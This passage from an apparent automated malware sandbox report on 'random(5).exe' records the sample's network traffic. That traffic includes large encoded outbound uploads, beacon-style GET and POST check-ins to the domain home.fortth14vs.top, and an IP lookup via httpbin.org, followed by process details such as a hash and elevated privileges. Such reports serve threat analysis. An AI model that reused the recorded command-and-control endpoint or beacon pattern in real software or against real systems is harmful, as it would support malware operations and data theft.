                                                  Data Ascii: zG\/aPBX6V3gD9IjMs6yfwd49\/1wzHh3A4fM84w3+q\/GnD\/1PA4rEPC0K\/teKOHckoYjnrp0\/Z4WpXqw+KdOMPePyDxe+jL43+A2X5PmvivwT\/qrgM+xtfLspxH+snCOefW8ZhqCxNej7PhvPs4rUOShJT58TTo0pfDCcppxODop7LjkdP5Uyv6IPwcKKKKDSn1+X6kLx8h\/f\/P6\/wCfRtWK\/UX\/AIJTf8E9\/wB
                                                  Jan 2, 2025 09:15:09.371953011 CET4944OUTData Raw: 61 53 56 75 49 5c 2f 4f 30 61 57 32 31 4c 77 79 6c 72 46 31 4e 74 70 4f 69 36 4e 4c 4c 6a 42 76 45 4a 4c 56 38 47 5c 2f 73 62 65 4f 74 4f 38 49 65 43 5c 2f 6a 4a 71 47 74 47 35 5c 2f 73 6e 77 74 42 6f 76 69 75 38 46 73 6b 63 6b 79 57 43 32 75 73
                                                  Data Ascii: aSVuI\/O0aW21LwylrF1NtpOi6NLLjBvEJLV8G\/sbeOtO8IeC\/jJqGtG5\/snwtBoviu8FskckyWC2usRapcRJLJBGzW0Gn28rxmcSzINltHLKNj+ceKPjd+0jLq\/wAQf2gvhd4\/07XvgJYzWltp\/h\/UvD0JTT7+3u9C02TwzqGhyxTa1pl7BaaifEF\/4gt9XtdO1O0mVkurW8ubbR7P+AOOvD\/Ns08VON45bi8Lk9O
                                                  Jan 2, 2025 09:15:09.371969938 CET2472OUTData Raw: 66 5c 2f 41 4b 33 30 39 65 58 32 66 6e 2b 48 5c 2f 42 4f 67 56 35 4e 73 6b 79 50 38 6a 2b 55 50 4e 38 7a 5c 2f 41 44 5c 2f 2b 76 6a 36 56 44 48 76 57 33 32 50 5c 2f 41 4d 73 7a 63 65 62 77 63 5c 2f 58 76 5c 2f 6e 38 71 75 62 73 71 36 66 36 6e 5c
                                                  Data Ascii: f\/AK309eX2fn+H\/BOgV5NskyP8j+UPN8z\/AD\/+vj6VDHvW32P\/AMszcebwc\/Xv\/n8qubsq6f6n\/lr+7z\/+r\/PHpVOT93I6OLiB\/wDSIpfL59P\/AK1aGlPr8v1Dy3aR\/l3+XmXPr+uKrfPJ+7dPLf8A5ZeX\/L9OuKuN\/q9+zdD5v7o+V7j\/AD3\/AMIfL8zZN9zzP9XH\/qP9H+uecdqDfnfl\/XzK0nzSff
                                                  Jan 2, 2025 09:15:09.372107983 CET9888OUTData Raw: 7a 4f 77 7a 42 63 33 7a 71 72 53 70 63 4b 74 76 74 56 2b 6d 50 69 58 52 39 4b 54 77 33 72 63 63 57 6e 32 6c 75 72 57 56 37 4b 66 73 30 45 64 73 54 4c 49 6a 4e 4a 49 54 41 73 5a 5a 35 47 4a 5a 32 62 4a 64 69 53 32 53 61 5c 2f 50 79 66 51 55 77 57
                                                  Data Ascii: zOwzBc3zqrSpcKtvtV+mPiXR9KTw3rccWn2lurWV7Kfs0EdsTLIjNJITAsZZ5GJZ2bJdiS2Sa\/PyfQUwWt5ymMnbMMr\/AN\/FAKge6McdT6\/ydnvidkHFed4zNKGTrhehiZ0\/Z5fSf1nDUeShRoym8RShCU62InTlicVVlhqMZ161So1eUmf27kvhFxRwlkGAyuvnNPizE4SlONXMeT6jiK\/NWqVYxjhK1SpClQw8Jxw+G
                                                  Jan 2, 2025 09:15:09.376554966 CET2472OUTData Raw: 66 68 33 77 6c 34 67 38 4a 61 64 34 49 38 52 57 4e 5c 2f 34 56 38 53 2b 47 76 46 76 67 37 51 5c 2f 69 46 48 34 74 68 73 66 43 75 6c 65 44 64 56 38 51 2b 4a 66 43 47 6d 2b 49 61 47 69 58 50 77 5c 2f 38 52 2b 49 5c 2f 46 56 68 6f 76 37 51 76 37 50
                                                  Data Ascii: fh3wl4g8Jad4I8RWN\/4V8S+GvFvg7Q\/iFH4thsfCuleDdV8Q+JfCGm+IaGiXPw\/8R+I\/FVhov7Qv7PF94K8D\/B3U\/jX4u+K66l8f7fwfoHhrSfHngb4dXGlX3he7\/Zxt\/jOddn8QfEfwk2nSW3wpuPDGp2V9dvYeJbi70fWLOx\/mvxpwH0ePGXJcmy\/j7iWrCPD2JqcTZTmnD2Z5xlWc5DUdHMsqxixeIy7D1J4Gl
                                                  Jan 2, 2025 09:15:09.376769066 CET4944OUTData Raw: 2b 4a 5c 2f 77 41 4b 44 62 33 5c 2f 41 4f 37 2b 4a 54 71 46 5c 2f 76 48 38 50 35 43 72 72 41 74 2b 65 61 6a 32 48 32 5c 2f 7a 2b 46 42 76 54 71 66 72 5a 32 33 5c 2f 41 4b 5c 2f 72 7a 71 56 48 4c 39 38 5c 2f 35 37 6d 72 4f 50 76 39 38 5c 2f 7a 36
                                                  Data Ascii: +J\/wAKDb3\/AO7+JTqF\/vH8P5CrrAt+eaj2H2\/z+FBvTqfrZ23\/AK\/rzqVHL98\/57mrOPv98\/z6\/wBarf8ALT\/P92tvf\/u\/iWMk+79\/\/P5n\/H8OKh\/Pfn\/PtjH+cVPL3\/3f8ag7\/wB\/8+P5isToB+v4f1NV36\/hUtQSf98f5\/z7+9B0Fdg\/9z5P+mefX2\/D\/OaY2e\/qOn+v6dverCfdH4\/zNR
                                                  Jan 2, 2025 09:15:09.376801014 CET4944OUTData Raw: 37 34 6b 6a 78 76 6e 65 57 31 63 39 7a 6a 47 35 72 69 71 47 45 70 55 59 32 2b 76 63 4e 34 6e 68 61 64 42 56 6c 79 31 5a 77 77 2b 58 34 7a 45 59 6a 41 71 74 4b 74 44 42 5a 6c 4b 65 4b 77 30 4b 56 50 46 5a 68 68 38 5a 33 63 46 66 74 41 38 38 34 51
                                                  Data Ascii: 74kjxvneW1c9zjG5riqGEpUY2+vcN4nhadBVly1Zww+X4zEYjAqtKtDBZlKeKw0KVPFZhh8Z3cFftA884Q4J4Y4Lfh1w9m+G4XwOV4XBYrHV8RKdSrlOeYjiChUq0XKVFU8Tjq8aWPjQhQq4vBYbB4etWlLBYOth\/N\/Dvxk8R\/HL4qL491vxBdeL9S1P9mz9lay+JnizUNN17TNV1\/4\/+G\/gP8OfDXxuv9ZGv6Zptxq+s
                                                  Jan 2, 2025 09:15:09.376863003 CET4944OUTData Raw: 5c 2f 50 70 53 62 44 37 66 35 5c 2f 43 70 61 4b 44 51 69 32 48 32 5c 2f 7a 2b 46 4d 71 78 55 66 6c 2b 5c 2f 36 66 5c 2f 58 6f 41 6a 71 50 79 5c 2f 66 38 41 54 5c 2f 36 39 53 55 55 46 38 37 38 76 36 2b 5a 58 6f 71 54 79 5c 2f 66 38 41 54 5c 2f 36
                                                  Data Ascii: \/PpSbD7f5\/CpaKDQi2H2\/z+FMqxUfl+\/6f\/XoAjqPy\/f8AT\/69SUUF878v6+ZXoqTy\/f8AT\/69R0HX7\/8Ad\/Eay7vwqGrFRMu38\/yoKGVCy7fcVNRQBXop8in+AH8s\/wCSaZQdBXoqTH38\/wCf4v8ACjy\/f9P\/AK9AEdRydvxqSmv90\/h\/MUHQQ0VJ5fv+n\/16jrT2fn+H\/BAj8v3\/AE\/+vUdWKh2
                                                  Jan 2, 2025 09:15:09.419253111 CET34608OUTData Raw: 56 5c 2f 4c 6b 39 66 30 48 2b 4e 46 57 4b 6a 5c 2f 35 5a 5c 2f 35 5c 2f 76 56 66 4f 5c 2f 4c 2b 76 6d 64 42 42 68 50 62 38 5c 2f 77 44 36 39 4e 66 72 2b 48 39 54 55 74 52 79 64 76 78 5c 2f 70 52 7a 76 79 5c 2f 72 35 6d 6c 50 72 38 76 31 49 36 4b
                                                  Data Ascii: V\/Lk9f0H+NFWKj\/5Z\/5\/vVfO\/L+vmdBBhPb8\/wD69Nfr+H9TUtRydvx\/pRzvy\/r5mlPr8v1I6KKKg0Cq9WKjk7fj\/SgCOiiiug6CPnZ+P6Z\/nn9KjqZ\/un8P5ioaAI5O34\/0quy9x+P+NXKY\/T8f6Gg6Cnsf2\/L\/AOypoXb6\/jVmo5O34\/0rSn1+X6mlPr8v1Idi+n8\/8aZIuefXg\/Xt\/n2qWitDQr0
                                                  Jan 2, 2025 09:15:09.467178106 CET1236OUTData Raw: 6f 79 6a 67 6a 68 36 72 34 30 30 63 74 72 35 4c 56 77 4f 42 34 54 6e 55 78 75 59 55 70 79 7a 62 41 63 45 34 7a 49 56 4c 4c 63 4e 57 78 72 6c 48 47 51 70 5c 2f 77 42 6f 35 37 53 70 5a 4e 50 4c 38 61 71 48 39 6f 55 73 77 78 4f 62 4e 50 4d 61 50 37
                                                  Data Ascii: oyjgjh6r400ctr5LVwOB4TnUxuYUpyzbAcE4zIVLLcNWxrlHGQp\/wBo57SpZNPL8aqH9oUswxObNPMaP7JhfpieBeb1+O86ofR4xOcUs3hLMuNsXDK8kr+1ybEcS4nMKkM\/r0cp9jPCYjGZhk2Vqtm0MZl6q5Zlc8NgsHiKsqVT6f8AEmu+Gm\/Zt+DvizwH8G\/2nPFb+NPgh+zb8UYv2tdE+B3i3U\/2bdV8a\/EWDQX+Lv
                                                  Jan 2, 2025 09:15:12.459002018 CET138INHTTP/1.1 200 OK
                                                  server: nginx/1.22.1
                                                  date: Thu, 02 Jan 2025 08:15:12 GMT
                                                  content-type: text/html; charset=utf-8
                                                  content-length: 1
                                                  Data Raw: 30
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.64971834.147.147.173805792C:\Users\user\Desktop\random(5).exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 2, 2025 09:15:12.811916113 CET99OUTGET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
                                                  Host: home.fortth14vs.top
                                                  Accept: */*
                                                  Jan 2, 2025 09:15:13.419538021 CET353INHTTP/1.1 404 NOT FOUND
                                                  server: nginx/1.22.1
                                                  date: Thu, 02 Jan 2025 08:15:13 GMT
                                                  content-type: text/html; charset=utf-8
                                                  content-length: 207
                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.64973034.147.147.173805792C:\Users\user\Desktop\random(5).exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 2, 2025 09:15:14.294465065 CET172OUTPOST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                                  Host: home.fortth14vs.top
                                                  Accept: */*
                                                  Content-Type: application/json
                                                  Content-Length: 31
                                                  Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                  Data Ascii: { "id1": "0", "data": "Done1" }
                                                  Jan 2, 2025 09:15:14.996077061 CET353INHTTP/1.1 404 NOT FOUND
                                                  server: nginx/1.22.1
                                                  date: Thu, 02 Jan 2025 08:15:14 GMT
                                                  content-type: text/html; charset=utf-8
                                                  content-length: 207
                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.64971034.200.57.1144435792C:\Users\user\Desktop\random(5).exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-02 08:15:07 UTC52OUTGET /ip HTTP/1.1
                                                  Host: httpbin.org
                                                  Accept: */*
                                                  2025-01-02 08:15:07 UTC224INHTTP/1.1 200 OK
                                                  Date: Thu, 02 Jan 2025 08:15:07 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 31
                                                  Connection: close
                                                  Server: gunicorn/19.9.0
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Credentials: true
                                                  2025-01-02 08:15:07 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                  Data Ascii: { "origin": "8.46.123.189"}


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:03:15:02
                                                  Start date:02/01/2025
                                                  Path:C:\Users\user\Desktop\random(5).exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\random(5).exe"
                                                  Imagebase:0xe30000
                                                  File size:4'484'096 bytes
                                                  MD5 hash:F200A3445A8034D201EEB79BB29E1D73
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >